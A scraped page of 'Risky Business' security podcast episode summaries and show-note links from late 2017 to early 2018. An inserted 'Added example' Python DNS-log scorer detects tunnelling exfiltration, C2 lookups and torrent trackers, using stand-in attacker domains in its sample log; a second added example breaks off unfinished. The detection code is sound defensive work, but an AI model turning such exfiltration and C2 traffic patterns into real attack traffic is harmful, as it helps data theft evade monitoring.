Windows Versions Released Since Windows 2000 Covert Data Channel in TLS Dodges Network Perimeter Protection | Threatpost | The first stop for security news An Adobe Flash 0day is being actively exploited in the wild | Ars Technica In just 24 hours, 5,000 Android devices are conscripted into mining botnet | Ars Technica Bug in Grammarly browser extension exposes virtually everything a user ever writes Cisco investigation reveals ASA vulnerability is worse than originally thought Matthew Olney on Twitter: "Hey guys, I know you're excited about CVE-2018-0101 (Cisco ASA SSL VPN RCE), but even if you don't have a service contract you can obtain the update from TAC. DO NOT download and install images from anyone but Cisco. (We appreciate the help, we really do...but...just....don't)" Cyber Operations Tracker | Council on Foreign Relations Interactives Atlassian Security Engineering Team Lead | SmartRecruiters Atlassian Sr. Manager of Global Security Engineering | SmartRecruiters

Risky Business #485 -- Infosec startups overfunded, good exits unlikely

Jan 31, 2018


On this week’s show we’re checking in with Kelly Shortridge and the topic is zombies. Not the botnet kind, the heavily-VC-backed kind.

A recent report from the Reuters news agency highlighted that the amount of VC pouring into the so-called “cyber” industry and the amount of money actually coming out of it in the form of profitable exits don’t match up. The industry is filling up with so-called zombie companies – they’ll never exit, but they’re not going to completely die, either.

As it turns out, Kelly recently did a presentation on precisely this topic, so in this week’s feature we get her take on why this is happening and what’s likely to change. The tl;dr is something will have to give in the next couple of years, and it’s going to be ugly.

In this week’s sponsor interview we check in with Jordan Wright of Duo Security. Jordan has done some research into phishing kits. While phishing isn’t the sexiest topic, the team at Duo has actually done some pretty comprehensive research here – they looked at thousands of kits and pulled out some interesting stats.

We’ll talk to him about that, and also about the likelihood that U2F hardware will soon be baked into consumer devices. That’s really going to change things in years to come.

Adam Boileau, as always, pops in to discuss the week’s news. We cover the:

Strava heatmap
Dutch infiltration of Cozy Bear
Possible nationalisation of the US 5G network on security grounds
Microsoft disabling Intel Spectre patches
Google’s Chronicle announcement
US$400m cryptocurrency ownage
MOAR

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Strava Data Heat Maps Expose Military Base Locations Around the World | WIRED Strava’s heatmap data lets anyone see the names of people exercising on military bases | WIRED UK “Heatmap” for social athlete’s app reveals secret bases, secret places | Ars Technica Dutch Spies Snooped on Russia's Elite Hackers, and More Security News This Week | WIRED To counter China, White House memo suggests a nationalized 5G network | Ars Technica Microsoft rushes Windows patch disabling Intel’s Spectre fixes due to instability Intel: Meltdown, Spectre silicon fixes coming 2018; 3D XPoint RAM, not so much | Ars Technica Chronicle: A Meteor Aimed At Planet Threat Intel? — Krebs on Security Two new cryptocurrency heists make off with over $400M worth of blockchange | Ars Technica Ethereum Startup Vanishes After Seemingly Making $11, Leaves Message: ‘Penis’ - Motherboard Now even YouTube serves ads with CPU-draining cryptocurrency miners | Ars Technica New Ads Policy: Improving Integrity and Security of Financial Product and Services Ads | Facebook Business Drugs Tripped Up Suspects In First Known ATM “Jackpotting” Attacks in the US — Krebs on Security U.S. economy could lose billions if attack shut down major cloud providers, report says DNC hires first ever CSO ahead of 2018 midterms Huawei loses another carrier deal as spying fears impede its US growth | Ars Technica DCShadow explained – Alsid blog Cisco patches a perfect 10.0 'critical' flaw in its popular security appliance Oracle issues patches for 10 'virtual machine escape' flaws in VirtualBox Under threat: Cyber security startups fall on harder times Phish in a Barrel

Risky Business #484 -- What's up with the new 702?

Jan 24, 2018


On this week’s show we’ll be taking a look at the freshly re-authorised section 702 of FISA. As you’ll soon hear, the updated section now allows the FBI to search data captured under 702 programs for evidence against US citizens in a range of circumstances, including, drum roll please, investigations with a cyber security tilt.

The co-founder of the Lawfare blog, law professor and Associate Dean for Academic Affairs at the University of Texas at Austin, Bobby Chesney, will be along in this week’s feature to talk about all of that!

Also joining us this week is Haroon Meer of Thinkst Canary. Haroon will be along to talk about the effectiveness of various honey tokens. Thinkst has been playing around with this stuff for a couple of years now, and Haroon will be joining us to talk about how they’ll wind up being used in an enterprise context. How do you get detection canaries to scale? That’s coming up later.

Adam Boileau, as always, pops in to discuss the week’s news. It’s been a relatively calm week, but we’ve got some interesting news about botched Spectre patches and a discussion around a sensational report about Kaspersky Lab published by Buzzfeed in conjunction with Russian outlet Meduza.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Linus Torvalds Thinks the Linux Spectre Patches are "UTTER GARBAGE" Dell Advising All Customers To Not Install Spectre BIOS Updates HP Reissuing BIOS Updates After Intel Meltdown and Spectre Updates Intel Halts Spectre/Meltdown Patching for Broadwell and Haswell Systems | Threatpost | The first stop for security news CoinReport Teetering Tether - CoinReport Evidence is mounting that much of the value in BTC may be artificial – James Crypto Hackers have stolen millions during the ICO craze, report says The $1.5b Bitcoin heist: Hackers have snatched 14 per cent of cryptocurrencies Inside The Fight For The Soul Of Kaspersky Lab Electoral Commission spent up to $8.6m counting ballots by hand after security concerns Facebook calls for cybersecurity research proposals as part of new grant program Less than 10 percent of Google users turn on two-factor authentication Hackers linked to Lebanese government caught in global cyber-espionage operation Google awards record $112,500 bug bounty for Android exploit chain Severe Electron framework vulnerability impacts apps like Skype and Slack Malicious Chrome extension is next to impossible to manually remove | Ars Technica Tinder's Lack of Encryption Lets Strangers Spy on Your Swipes | WIRED Blizzard Fixes DNS Rebinding Flaw that Put All the Company's Users at Risk British 15-year-old gained access to intelligence operations in Afghanistan and Iran by pretending to be head of CIA, court hears Canarytokens Canary — know when it matters

Risky Business #483 -- Internet censorship in Iran, China

Jan 17, 2018


On this week’s show we chat with Collin Anderson about Iranian internet censorship, as well as how sanctions on Iran led Google to block app engine access within Iran.

That’s a problem for Signal users there, because when the primary Signal servers are blocked, the software falls back to a domain-fronting approach that uses, drum roll please, Google App Engine.

That’s a pretty wide ranging discussion of ‘net censorship in Iran and ‘net censorship generally and that’s coming up after the news.

This week’s show is brought to you by Bugcrowd, big thanks to them for that. In this week’s sponsor interview we’ll chat with Bugcrowd trust and security engineer Keith Hoodlet about some work they’ve been doing on producing detailed remediation information for their clients.

Adam Boileau is also along, as always, to discuss the week’s security news. The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Russian military was behind ‘NotPetya’ cyberattack in Ukraine, CIA concludes - The Washington Post Russian hacking group Fancy Bear prepares to attack Winter Olympics, U.S. Senate Experts link Shadow Brokers and Russia Did Twitter engineers just admit to shadow-banning conservatives? Nope | Ars Technica Twitter Says No, Hundreds Of Twitter Employees Are Not Reading Your DMs Apple hands Chinese iCloud to Guizhou-Cloud Big Data Industry • The Register Bitcoin, Ethereum and almost every other cryptocurrency is plunging | TechCrunch Bitcoin Blackmail by Snail Mail Preys on Those with Guilty Conscience — Krebs on Security Trisis has the security world spooked, stumped and searching for answers Skygofree: Following in the footsteps of HackingTeam - Securelist Serial SWATter Tyler “SWAuTistic” Barriss Charged with Involuntary Manslaughter — Krebs on Security Canadian Police Charge Operator of Hacked Password Service — Krebs on Security Who Ran — Krebs on Security FBI Director Calls Smartphone Encryption an 'Urgent Public Safety Issue' | Threatpost | The first stop for security news Microsoft adopts Signal's encryption protocol for new private conversation mode Flaw in WhatsApp and Signal exposes group chats to 'extremely difficult' hacks Alliance aims to thwart nosy Wi-Fi spies with new security standards Fourth Fappening Hacker Caught by the FBI Senators introduce bill to counter bad cybersecurity practices in credit reporting industry Facebook Knows How To Track You Using The Dust On Your Camera Lens | Gizmodo Australia VirusTotal's new graph feature maps malware House Votes to Reauthorize Controversial Spy Provision, Section 702 | Threatpost | The first stop for security news Intel AMT Loophole Allows Hackers to Gain Control of Some PCs in Under a Minute | Threatpost | The first stop for security news Lenovo Patches Networking OS Vulnerability Dating Back to 2004 | Threatpost | The first stop for security news VMware Issues 3 Critical Patches for vSphere Data Protection | Threatpost | The first stop for security news EMC, VMware security bugs throw gasoline on cloud security fire | Ars Technica BitTorrent users beware: Flaw lets hackers control your computer | Ars Technica 2018.01.09 Issue with TLS-SNI-01 and Shared Hosting Infrastructure - Incidents - Let's Encrypt Community Support Graham Cluley on Twitter: "They are clearly never going to have any problems with that Hawaiian missile alert menu ever again..." Microsoft and Amazon Enable Censorship Circumvention Tools in Iran. Why Doesn’t Google? - Motherboard Iran unblocks Telegram messenger service shut down during country-wide protests | News | DW | 14.01.2018

Risky Business #482 -- Meltdown and Spectre coverage without the flappy arms

Jan 10, 2018


On this week’s show Matt “pwnallthethings” Tait joins the show to walk us through the so-called Meltdown and Spectre bugs. Most of the coverage of the flaws has either been massively hyped or detail-free, and Matt pops by to untangle the whole mess. He does a great job of it, too.

This week’s show is brought to you by Cylance. CTO Rahul Kashyap will be along in the sponsor chair to talk about why so many AV packages were causing Windows boxes to BSOD when Microsoft pushed its Meltdown patch.

Adam Boileau is back in the news hotseat, and boy oh boy do we have a lot to cover. Show notes are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Intel CEO sold all the stock he could after Intel learned of security bug | Ars Technica Bad docs and blue screens make Microsoft suspend Spectre patch for AMD machines | Ars Technica MacOS LPE Exploit Gives Attackers Root Access | Threatpost | The first stop for security news Project Zero: aPAColypse now: Exploiting Windows 10 in a Local Network with WPAD/PAC and JScript NSA contractor pleads guilty to charge of hoarding troves of classified docs - Cyberscoop The Wassenaar Arrangement's latest language is making security researchers very happy White House Bans Staff From Using Personal Mobile Phones at Work - Bloomberg New Rules Announced for Border Inspection of Electronic Devices | Threatpost | The first stop for security news Facebook Is Disrupting North Korean Hacking Operations - Motherboard Game-changing attack on critical infrastructure site causes outage | Ars Technica I’m harvesting credit card numbers and passwords from your site. Here’s how. Man's Life Savings Stolen from Hardware Wallet Supplied by a Reseller - Bitcoin News Electrum Wallet Keys Could Be Snatched by Malicious Websites - Inside Bitcoins - News, Price, Events | Inside Bitcoins – News, Price, Events Mailgun Security Incident and Important Customer Information Reddit admits its email provider was hacked to steal Bitcoin Cash tips Oracle app server hack let one attacker mine $226,000 worth of cryptocoins | Ars Technica Jailed Russian says he can prove hack of DNC on Kremlin's orders Hackers take control of security firm’s domain, steal secret data | Ars Technica How Kaspersky’s Software Fell Under Suspicion of Spying on America - WSJ “Political pressure” reportedly kills Huawei/AT&T smartphone deal | Ars Technica Snowden’s App Probably Can’t Protect You From Targeted State Surveillance - Motherboard Twitter Promoted a Tweet That Steals Your Credit-Card Details Ukrainian hackers turn on own government to make it care about cybersecurity -Euromaidan Press | What Happens If Russia Attacks Undersea Internet Cables | WIRED Cyxtera Technologies to acquire offensive cyber firm Immunity Full Disclosure: CVE-2017-15944: Palo Alto Networks firewalls remote root code execution Ruben Berenguel, PhD on Twitter: "We’ve seen CPU usage go from ~20% to ~40% (and now critical machines with redundancy upscale under loads that before didnt made them blink). Costs this month in AWS will go up 10%, I predict (very least, haven’t checked EMR effect yet, if similar, 20-30%) #spectre #meltdown #fb" A collection of links to PDFs of papers on Micro-Architectural Attacks (sorted by date) by Paul Harvey - kernel, vulnerabilities, meltdown | Peerlyst Joanna Rutkowska on Twitter: "@tehjh @anders_fogh Something much simpler than what you did :) See below. This is part of the work Rafał Wojtczuk and I did back in 2010. It's no longer under…" CVE-2017-5753, CVE-2017-5715, and CVE-2017-5754 (Meltdown and Spectre) Windows antivirus patch compatibility Cylance | Meltdown and Spectre Vulnerabilities

Risky Business #481 -- Inside the Anthem breach with someone who was there

Dec 13, 2017


This is the last show for the year, Risky Business will return on January 10th 2018.

In this week’s feature Stephen Moore joins us. He was formerly the Staff Vice President of Cyber Security Analytics at Anthem, the healthcare company that was spectacularly owned by a Chinese APT crew in 2015.

Instead of us all just saying “lol they got owned, they’re idiots,” I thought it would be a good idea to actually talk to someone who was there. As you’ll hear, Anthem’s team knew they were being targeted by an APT crew, did its best to fend off the attackers, but sadly they lost anyway.

It’s sobering listening.

This week’s sponsor interview is also just great. We’ll check in with Casey Ellis of Bugcrowd. He’ll be along to talk about this whole Uber mess. A lot of the reporting around the so-called Uber data breach seemed to fixate a bit on the fact that the attacker was paid via the HackerOne bug bounty platform. The coverage has conflated extortion with bug bounty programs, much to Casey’s dismay. He’ll be along later to share his views on what the Uber snafu means, as well as to share his thoughts on DJI’s disastrous bug bounty program.

Adam Boileau, as usual, stops by to discuss the week’s security news, and also to wrap up the 2017 season.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes 1.4 Billion Clear Text Credentials Discovered in a Single Database APT 34 Is an Iran-Linked Hacking Group That Probes Critical Infrastructure | WIRED This country's hacking efforts have become too big to ignore Popular Destinations rerouted to Russia | BGPmon Italian Prosecutor Makes Request to Close Hacking Team Investigation - Motherboard Jailed Russian hacker: I hacked Democrats 'under the command' of Russian intelligence agents | Business Insider Australia Seeks New Gag Laws That Could See Journalists And Whistleblowers Jailed for 20 Years Mark Di Stefano 🤙🏻 on Twitter: "Twitter says it's removing 3.2 million accounts every single week. A staggering number." Phishers Are Upping Their Game. So Should You. — Krebs on Security It's easy to fake Extended Validation certificates, research shows - Cyberscoop On the value of EV - Google Groups Nope, this isn’t the HTTPS-validated Stripe website you think it is | Ars Technica Hackers hit key ATM network in crime spree that clears $10 million | Ars Technica Want to Launder Bitcoins? How Crooks Are Hacking iTunes and Getting Paid by Apple Google Releases Tool To Help iPhone Hackers - Motherboard Android Flaw Allows Attackers to Poison Signed Apps with Malicious Code | Threatpost | The first stop for security news Tim Watts MP on Twitter: "Hey @riskybusiness - can the Australian political figure single tweet hacker be this week's skateboarding dog?" Ambassador Joe Hockey's account 'likes' tweet calling Malcolm Turnbull a 'cranky prick' Mike Arpaia on Twitter: "@dinodaizovi @riskybusiness Even if you're blocking and doing the analysis on the host, that takes cycles for you to make your decision. Nothing is"real time", it's all…" Airlock Digital - News

Risky Biz Soap Box: Bromium on custom microvirtualization for legacy apps

Dec 11, 2017


Today’s Soap Box is brought to you by Bromium.

Bromium makes a security suite that wraps key applications in microvisors. It’s a way to get app-specific, hardware-based virtualisation.

Historically Bromium has wrapped things like browsers and the office suite in these microvisors. Bromium has also found a lot of success selling to organisations that have to run out-of-date browsers and Java. Wrapping an old browser in Bromium makes it much safer to use: an exploit still runs, but it runs inside a throwaway micro-VM rather than on the host.

Well, now they’ve gone a step further. They’ve launched secure app extensions, which is where they custom-wrap your application, or an application you use, into a microvisor. So if you’re using some awful, old, insecure enterprise app and it’s keeping you awake at night, this might be a solution for you if you can’t rip and replace.

Have a listen!

Show notes [pdf] Securing Legacy Applications with Bromium Application Isolation and Control

Risky Business #480 -- Uber, Kaspersky woes continue

Dec 6, 2017


On this week’s show we’ll be having a look at the latest OWASP top 10. As many of you would know, the new list is out. A couple of items have been dropped and a couple of items have been introduced. But we’re really using this new top 10 as an excuse to have a broader chat about the top 10 and the OWASP mission more generally.

As you’ll hear, everyone seems to agree the list is a good thing, but maybe OWASP needs to sharpen its communication strategy a little to make itself more accessible to the developers it’s trying to help.

We’ll hear from OWASP Bristol chapter leader and Veracode consultant Katy Anton on that, as well as Safestack head honcho Laura Bell and penetration tester and founder of Matchme consulting Pam O’Shea.

This week’s show is brought to you by a first time sponsor, VMRay. They make malware analysis software that’s very popular with CERTs, but I suspect a lot of listeners out there in IR will also be interested in what they’re doing. The core offering is a cloud malware analyser that isn’t public, so if you don’t want to fire off a sample to VirusTotal and thereby let the bad guys know you’re on to them, VMRay is a better option.

VMRay didn’t actually put one of its own staff in this week’s sponsor slot; it chose one of its users instead – Koen Van Impe. He pops along to talk through what he uses VMRay for and to give us a bit of an overview of what it does.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Uber security executives leave company amid lawsuit and breach investigation Proposed law would jail execs who fail to report data breaches – Naked Security U.K. cyber agency tells government to handle Russian anti-virus software with caution Former N.S.A. Employee Pleads Guilty to Taking Classified Information - The New York Times Ex-NSA Hackers Worry China And Russia Will Try to Arrest Them - Motherboard The US Should Modernize Election Systems to Prevent Hacking | WIRED Russia Wants to Launch Backup DNS System by August 1, 2018 How DJI fumbled its bug bounty program and created a PR nightmare DHS: Drone Maker "Likely" Helping China Spy on US The EU Will Foot the Bill for VLC Player's Public Bug Bounty Program Privacy regulator warns MPs over shared passwords - BBC News SEC Halts a Silly Initial Coin Offering - Bloomberg ‘Mailsploit’ Lets Hackers Forge Perfect Email Spoofs | WIRED Andromeda botnet mastermind arrested in Belarus, identified by his ICQ number Hacked Password Service Leakbase Goes Dark — Krebs on Security Dell, Other Vendors Start Shipping Laptops With Intel ME Firmware Disabled Satori Botnet Has Sudden Awakening With Over 280,000 Active Bots Cisco Patches Critical Playback Bugs in WebEx Players | Threatpost | The first stop for security news Flaw Found In Dirty COW Patch | Threatpost | The first stop for security news GitHub will soon warn developers of insecure dependencies, adds news feed, team chat and more Man Hacks Jail Computer Network to Get Friend Released Early Malware Detection & Malware Sandbox Analysis | VMRay Securing Ethereum at Empire Hacking | Trail of Bits Blog Careers at Fitbit

Snake Oilers #4: Dino Dai Zovi, Chris McNab and Sylvain Gil

Dec 4, 2017


We’ll be hearing from three vendors in this edition of Oilers. Dino Dai Zovi will be along first up to talk about his startup, Capsule8, which looks very promising indeed.

After we’ve heard from Dino we’ll be chatting with Chris McNab. He used to run incident response for iSec Partners and later NCC Group, but these days he runs AlphaSOC, a company he founded. They’re a very simple play – they do DNS and IP analytics.

They offer that as a Splunk application or via an API, and you would be amazed how much bad stuff you can kick off your network with something as simple as DNS and IP analytics. Tor exfil, whole families of malware, BitTorrent, all sorts of stuff. Chris will be along soon to talk about that.
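What “DNS and IP analytics” looks like in practice, as an added example that is not AlphaSOC’s nfr utility or its API: a small scorer that parses DNS query logs and flags known-bad domains, tracker-style names, and the long high-entropy labels that DNS tunnelling and exfil tools produce. The log format, the indicator list, the score weights and the sample lines are all assumptions constructed for the example.

```python
# Added example: scoring DNS query logs for the kinds of traffic the
# paragraph mentions (tunnelled exfil, known malware C2, BitTorrent
# trackers). Log format, indicators and sample lines are constructed;
# this is not AlphaSOC code.
import math
import re
from collections import Counter

# Constructed indicator list. A real deployment feeds this from threat
# intel and keeps it current.
KNOWN_BAD_DOMAINS = {"c2.evil-updates.example"}
# Naming pattern common to BitTorrent tracker hostnames (constructed).
TORRENT_TRACKER_RE = re.compile(r"(^|\.)tracker\.|^announce\.")

# Constructed log format: timestamp, client IP, query type, query name.
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\d+\.\d+\.\d+\.\d+)\s+(?P<qtype>[A-Z]+)\s+(?P<qname>\S+)$"
)


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for empty input)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registered_domain(qname: str) -> str:
    """Naive eTLD+1 (last two labels). Real code should use the public suffix list."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def score_query(qtype: str, qname: str):
    """Return (score, reasons) for a single DNS query."""
    qname = qname.rstrip(".").lower()
    score, reasons = 0, []
    domain = registered_domain(qname)
    if domain in KNOWN_BAD_DOMAINS or qname in KNOWN_BAD_DOMAINS:
        score += 10
        reasons.append("known-bad domain")
    if TORRENT_TRACKER_RE.search(qname):
        score += 5
        reasons.append("torrent tracker naming")
    # Tunnelling heuristic: long, high-entropy labels, deep subdomains and
    # TXT/NULL queries are what DNS exfil tools look like on the wire.
    sub = qname[: -len(domain)].rstrip(".") if qname != domain else ""
    if sub:
        longest = max(len(label) for label in sub.split("."))
        ent = shannon_entropy(sub.replace(".", ""))
        if longest >= 30 and ent >= 3.5:
            score += 6
            reasons.append(f"high-entropy label (len={longest}, H={ent:.2f})")
        if sub.count(".") >= 3:
            score += 1
            reasons.append("deep subdomain")
        if qtype in ("TXT", "NULL"):
            score += 2
            reasons.append(f"{qtype} query with data-bearing subdomain")
    return score, reasons


def analyse(log_text: str, threshold: int = 5):
    """Parse log lines; return an alert dict for every query scoring >= threshold."""
    alerts = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than crash the pipeline
        score, reasons = score_query(m["qtype"], m["qname"])
        if score >= threshold:
            alerts.append({"client": m["client"], "qname": m["qname"],
                           "score": score, "reasons": reasons})
    return alerts


# Constructed sample log: one benign host, one C2 lookup, one TXT exfil
# query with a 30-character random label, one tracker lookup.
SAMPLE_LOG = """
2017-12-04T09:00:01Z 10.1.1.20 A www.example.com
2017-12-04T09:00:02Z 10.1.1.20 A c2.evil-updates.example
2017-12-04T09:00:03Z 10.1.1.31 TXT zq3vk8m1px5w9r2c7t4ynb6hd0jgfs.exfil.example
2017-12-04T09:00:04Z 10.1.1.31 A tracker.badtorrent.example
2017-12-04T09:00:05Z 10.1.1.44 A mail.example.com
"""

if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

The entropy threshold is tuned for base32/base64-style labels; hex-encoded exfil tops out near 3.3 bits per character, so a deployment that expects hex tunnels lowers the bar or adds a hex-only check.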

Then we’re rounding it out with a conversation with Sylvain Gil, the co-founder of Exabeam.

Exabeam started off in analytics and UEBA, but they’ve taken a bunch of money and they’re spending it on building out their SIEM, which is already pretty popular in certain circles because they don’t license it based on volume. Sylvain pops along later on to talk about how that’s changing SIEM use cases for a bunch of people. For example they can pump their EDR logs into their SIEM without wearing a seven figure SIEM consumption bill. He also walks through how they’ve used open source technologies like Hadoop in their products. It’s an all around chat that one, not so much a pitch, but yeah, I found it really interesting and I hope you will too.

Links to all three profiled vendors are below!

Show notes
Capsule8
AlphaSOC
GitHub - alphasoc/nfr: A utility to score DNS traffic via the AlphaSOC API and identify security threats
Security Intelligence | SIEM & UEBA | Exabeam

Risky Business #479 -- Oh, Uber. Oh, Apple.

Nov 29, 2017


On this week’s show we’re speaking with Susan Hennessey, a Fellow in National Security in Governance Studies at the Brookings Institution and managing editor of Lawfare. We’re talking to her about cross-border law enforcement in the Internet age.

We hear a lot of people in the infosec community expressing some discomfort with the FBI’s use of Network Investigative Techniques designed to de-cloak Tor users. Susan pops by to explain why the FBI and other law enforcement bodies aren’t worried about the international ramifications of dropping a de-cloaking technique on the whole planet.

We also cover off a few of the other issues around how data can be turned over to various governments. It’s a fascinating chat and it’s coming up after the news.

This week’s show is brought to you by Tenable Security. In this week’s sponsor slot we’ll be hearing from Ray Komar, Tenable’s VP of technical alliances. We’re talking to Ray about a partnership Tenable has formed with Siemens. They’re trying to tackle the issue of tracking vulnerabilities in industrial control system equipment, but as you’ll hear, people aren’t actually buying it so much for the vulnerability tracking side, they’re buying it for the visibility side. It turns out dropping a passive scanner on your ICS network is a good way to know what’s actually ON your ICS network.

As always, Adam Boileau pops in to discuss the security news. We cover:

The Uber hack
Apple’s comedy “root” bug
Krebs on possible Shadowbrokers link
Charges against more Chinese APT operators and Iranian HBO attacker
More “hack back” legislation action
Intel ME bug details
Golden SAML
MOAR

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Uber Hid 57-Million User Data Breach For Over a Year | WIRED
Lawmakers demand answers from Uber after massive data breach - Cyberscoop
Apple MacOS High Sierra Security Flaw Lets Anyone Get Root Access, No Password Required | WIRED
Who Was the NSA Contractor Arrested for Leaking the ‘Shadow Brokers’ Hacking Tools? — Krebs on Security
DOJ reveals indictment against Chinese cyber spies that stole U.S. business secrets
China hides homegrown hacks from its vulnerability disclosure process
Feds Indict Iranian for HBO Hack—But Extradition Isn't Likely | WIRED
Guilty plea for Canadian charged in 2014 Yahoo hacking case
Rep. Graves: 'Active defense' bill will launch a new industry
Intel Management Engine Flaws Leave Millions of PCs Exposed | WIRED
mjg59 | Potential impact of the Intel ME vulnerability
Researcher discovers classified Army intel app, data on open public AWS bucket | Ars Technica
How Bots Broke the FCC's Public Comment System During the Net Neutrality Debate | WIRED
Newly Published Exploit Code Used to Spread Mirai Variant | Threatpost
Fund Targets Victims Scammed Via Western Union — Krebs on Security
No Patch Available for RCE Bug Affecting Half of the Internet's Email Servers
Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps - CyberArk
Could Terrorists Hack an Airplane? The Government Just Did.
Symantec Encryption Desktop Local Privilege Escalation – Exploiting an Arbitrary Hard Disk Read/Write Vulnerability Over NTFS – Nettitude Labs
Patrick Gray on Twitter: "So the password Wikiloons sent Jnr wasn’t a CMS password, it was just used to get to a content preview. A dozen outlets had the password, so…"

Risky Business #478 -- Why a "Digital Geneva Convention" won't work

Nov 15, 2017


On this week’s show we check in with Mara Tam. She’ll be telling us why the idea of a so-called “Digital Geneva Convention” is silly.

Then, after that, Rich Smith of Duo Security will be in the sponsor chair.

You may have heard about some recent research Duo Labs did into Apple EFI patches basically not working/sticking. Rich walks us through that research, why Duo did it, how they did it, and what it can tell us. It might be Mac research but the real worry, as you’ll hear, is around Wintel firmware.

Adam Boileau pops by for this week’s news discussion. We’ll be covering:

Facebook’s plan to combat “non-consensual intimate imagery”
Wikileaks Vault8 leaks
Assange sending a “guessed” password to Donald Trump Jnr
NYTimes reports on the Shadowbears
Cracking FaceID with a rubber mask
MOAR

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Facebook Workers, Not an Algorithm, Will Look at Volunteered Nude Photos First to Stop Revenge Porn
The Facts: Non-Consensual Intimate Image Pilot | Facebook Newsroom
If Facebook Actually Wants to Be Transparent, It Should Talk to Journalists - Motherboard
WikiLeaks Starts Releasing Source Code For Alleged CIA Spying Tools - Motherboard
Donald Trump Jr. and WikiLeaks Talking Privately on Twitter Makes Perfect Sense | WIRED
WikiLeaks on Twitter: "New WikiLeaks publication reveals CIA wrote code to impersonate Kaspersky Labs anti-virus company"
Donald Trump Jr. on Twitter: "Here is the entire chain of messages with @wikileaks (with my whopping 3 responses) which one of the congressional committees has chosen to…"
Security Breach and Spilled Secrets Have Shaken the N.S.A. to Its Core - The New York Times
Hackers say they broke Apple’s Face ID. Here’s why we’re not convinced | Ars Technica
Hackers Say Plastic Surgeon to the Stars Hacked Back at Them
Uber drivers in Lagos, Nigeria use fake Lockito app to boost fares — Quartz
CEO who presided over Mt. Gox’s collapse could end up with massive profits | Ars Technica
Google Begins Removing Play Store Apps Misusing Android Accessibility Services | Hackbusters
OnePlus inadvertently left a backdoor on its phones
Muslim activists hack Isis mailing list hours after terrorists claimed it was unhackable | The Independent
This AI Bot That Messes With Email Scammers As Long As Possible Is Brilliant - Digg
The FBI Blindly Hacked Computers in Russia, China, and Iran
Huddle's 'highly secure' work tool exposed KPMG and BBC files - BBC News
Microsoft Provides Guidance on Mitigating DDE Attacks | Threatpost
How AV can open you to attacks that otherwise wouldn’t be possible | Ars Technica
Cryptojacking craze that drains your CPU now done by 2,500 sites | Ars Technica
Crooks sending fake Apple emails in order to unlock stolen iPhones
Hacker Wannabes Fooled by Backdoored IP Scanner
Cyber Security | Global Cyber Security Services Provider
About the security content of iOS 11 - Apple Support
Microsoft's Smith adds 'cyber Red Cross' to his 'digital Geneva Convention' call
thinkst Thoughts...: A Geneva convention, for Software
thinkst Thoughts...: On anti-patterns for ICT security and international law
The need for a Digital Geneva Convention - Microsoft on the Issues
The Apple of Your EFI: Mac Firmware Security Research | Duo Security

Risky Business #477 -- US mulls charges against Russian officials involved in DNC hack

Nov 8, 2017


There’s no feature interview in this week’s edition, just a slightly longer news session with Adam Boileau, then it’s straight into this week’s sponsor interview.

Adam and I will be speaking about:

Charges against Russian officials involved in the DNC hack
Confirmation of Russian involvement in Ukraine artillery targeting app
Attribution claims in Bad Rabbit campaign
“Hack Back” bill is picking up steam
1 million installations of counterfeit WhatsApp clone
A properly awful Tor browser bug
The cryptocurrency comedies/tragedies of the week
MOAR

Marco Slaviero is this week’s sponsor guest. He’ll be along with a radical marketing approach: he’ll be telling us what Canaries can’t do! But you know what? It’s a useful thought exercise. He’ll also update us on the latest stuff they’re doing in the cloud. They’ve got some new VMware virtual canaries too.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
US could charge six Russian officials over DNC email hacking
Russia hackers had targets worldwide, beyond US election - The Washington Post
Tracing Fancy Bear’s paw prints – Raphael – Medium
The GRU-Ukraine Artillery Hack That May Never Have Happened
How Hackers Broke Into John Podesta and Colin Powell’s Gmail Accounts - Motherboard
Ukraine blames infamous Russian hackers for 'BadRabbit' ransomware attack
Chinese hackers starting to return focus to U.S. corporations
'Hack back' bill gains 7 new co-sponsors
Ex-NSA Director Says Companies Should Never Hack Back Because They Could Start Wars - Motherboard
How Level 3's Tiny Error Shut Off the Internet for Parts of the US | WIRED
More Than 1 Million People Downloaded a Fake WhatsApp Android App - Motherboard
Beating the iPhone X Face ID Is Hard. We Know, Because We Tried | WIRED
Flaw crippling millions of crypto keys is worse than first disclosed | Ars Technica
Critical Tor flaw leaks users’ real IP address—update now | Ars Technica
Stuxnet-style code signing is more widespread than anyone thought | Ars Technica
SEC warns that celebrity cryptocurrency endorsements may be illegal | Ars Technica
Dan Guido on Twitter: "Parity likely did not think of their wallet as a classic contract. Their code is in a library, and they delegatecall to execute it directly."
One Bitcoin Transaction Now Uses as Much Energy as Your House in a Week - Motherboard
More than two years after historic breach, OPM continues to struggle with cybersecurity
Texas Shooter's Phone Encrypted | Threatpost
Chain of 11 Bugs Takes Down Galaxy S8 at Mobile Pwn2Own | Threatpost
Patrick Gray on Twitter: "Oh my fucking god."

Snake Oilers #3: Bot prevention and distributed "crypto magic" credit card storage

Nov 6, 2017


In this edition of Snake Oilers we’re taking a look at two Australian companies and their solutions: Kasada and Haventec.

Kasada’s product is a simple one – it’s bot prevention using proof of work and a couple of other things, and Haventec’s solution is a bit more out there.
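The proof-of-work idea in one runnable form, added here and not Kasada’s code: the server hands out an HMAC-signed, time-limited challenge, the client burns CPU finding a counter whose SHA-256 hash has enough leading zero bits, and the server verifies the tag, the expiry, the work and that the challenge has not been replayed. The challenge layout, the difficulty and the server key are assumptions made for the example.

```python
# Added example: a hashcash-style proof-of-work gate of the kind a bot
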